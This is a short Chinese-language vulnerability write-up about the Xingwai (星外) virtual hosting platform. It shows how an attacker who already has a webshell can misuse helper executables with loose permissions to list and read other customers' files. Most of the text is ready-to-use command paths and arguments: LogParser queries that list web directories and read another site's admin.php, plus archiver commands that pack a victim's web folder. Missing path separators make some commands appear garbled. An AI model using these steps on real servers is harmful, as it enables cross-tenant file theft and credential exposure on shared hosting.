星外虚拟主机跨目录读取文件漏洞,需要一定条件。
详细说明:
问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:
c:windows7i24IISLOG.exe c:windows7i24IISLOG2.exe c:windows7i24IISLOG3.exe c:windows7i24IISLOG4.exe c:windows7i24tool.exe c:windowsrsb.exe
其中的7i24IISLOG.exe其实就是LogParser,LogParser是一款强大日志分析工具,下面利用它来列web目录:
在 webshell中
CmdPath:
c:windows7i24IISLOG
Argument:
“select top 100 path from e:host*.*” -i:FS -rtp:-1
下面读取文件内容:
c:windows7i24IISLOG
“select text from e:host233abwebadmin.php” -i:textline -rtp:-1
7i24IISLOG3.exe能够打包ISO文件,利用它同样的也可以列出目录文件信息:
CmdPath:
c:windows7i24IISLOG3
Argument:
e:host233abweb c:windowstemp123.rar
同样的还有rbs.exe
CmdPath:
c:windowsrbs -r -v 024dbjj
Argument:
e:host233abweb*.*